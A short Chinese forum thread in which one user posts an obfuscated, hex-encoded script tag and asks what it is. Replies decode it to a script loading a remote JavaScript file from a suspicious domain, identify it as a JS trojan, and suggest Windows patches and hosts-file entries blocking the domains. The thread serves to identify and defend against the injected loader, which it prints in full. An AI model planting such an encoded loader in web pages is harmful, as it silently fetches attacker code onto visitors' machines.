<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>上面是什么东西?告诉我

解决方案 »

  1.   

    将\x3c中的3c转成十进制,是60在网页代码中输入&#60你看是什么后面的以此类推
      

  2.   

    最终结果<script src=http://OffIce.FAQServ.CoM/FAQ.js></script>
      

  3.   

    js木马,系统要注意打上ms06-014、ms07-17补丁
    删除后不再出现最好,呵呵。
    有时要防止局域网内其他中木马的机器再次进行感染,可通过arp防火墙禁止。暂时可以在 hosts文件中加入如下内容就可以屏蔽文件中定义的对应的网址。 (文件位置C:\WINDOWS\system32\drivers\etc 可以用记事本打开)
    127.0.0.1 localhost 
    127.0.0.1 www.59.vc  
    127.0.0.1 59.vc 
    127.0.0.1 OffIce.FAQServ.com  
    127.0.0.1 FAQServ.com 
    127.0.0.1 www.FAQServ.com 
    进行屏蔽